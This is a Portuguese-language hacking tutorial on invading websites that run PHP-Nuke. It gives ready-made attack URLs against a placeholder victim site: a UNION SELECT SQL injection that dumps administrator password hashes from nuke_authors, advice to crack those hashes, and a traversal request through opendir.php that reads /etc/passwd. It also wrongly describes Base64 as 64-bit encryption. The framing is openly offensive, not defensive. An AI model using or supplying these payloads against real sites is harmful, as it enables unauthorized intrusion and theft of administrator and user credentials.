INVASAO DE SITES QUE USAO NUKE-PHP
...........................................................................................................................................................................................................................................
Primeiro vamos ver o que é Nuke-PHP.
ajudahacker.br30.com
O PHP-Nuke é um software gratuito criado pelo venezuelano Francisco Burzi, baseado na linguagem PHP. Devido à facilidade de uso,
principalmente para publicação de notícias, tornou-se bastante popular e foi adotado por inúmeros sites.
Ele é um pacote de software que permite administrar portais , realizando tarefas como atualizações de notícias e manutenção de usuários .
Muito útil para os usuários de PHP Atualmente milhares de sites rodam o software PHP-Nuke.
.................................................................................................................................................................................................................................................
Principais falhas:
Falha 1
-A senha de administração do PHP-Nuke é guardada em um cookie e codificada em Base64, um método de criptografia de 64 bits
considerado pouco seguro.
O ataque aos servidores pode ser feito atraves de códigos HTTP (isto significa que voce pode injetar os códigos no proprio navegador, de
preferencia o IE)
Falha 2
-erro no arquivo "opendir.php"
(...)
$REQUEST_URI = strip_tags($REQUEST_URI);
$res = explode("$PHP_SELF?", $REQUEST_URI);
$odp_cat = $res[1];
if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);
(define $requesturl)
(...)
Pratica 1 :
Vamos visualizar senhas criptografadas do aministrador e usuarios on line no site usando um codigo exploit.
código:
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 UNION SELECT name,1,pwd,aid FROM nuke_authors
Site ( vítima ):
WWW.SITEPRASERINVADIDO.COM
Injection pronto:
WWW.SITEPRASERINVADIDO.COM/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 UNION SELECT name,
1,pwd,aid FROM nuke_authors
Obseve as senhas criptografadas, basta um decripter.
pratica 2 :
Na segunda falha podemos usar o operdir.phpInocente demais operdir(abrir diretorio)
Basta um pouquinho de conhecimento de UNIX que da para abrir o que quiser dentro no servidor.
Eu não vou colocar nenhum site aqui não =), mas um exemplo de exploit para localizar senhas fica assim:
/WWW.SITEPRASERINVADIDO.COM/opendir.php?requesturl=/etc/passwd
.......................................................................................................................................................................................................................................................
Este tipo de falha NÃO é uma coisa recente, faz muito tempo que existe, as ultimas versões do NUKE-PHP nem contem mais falhas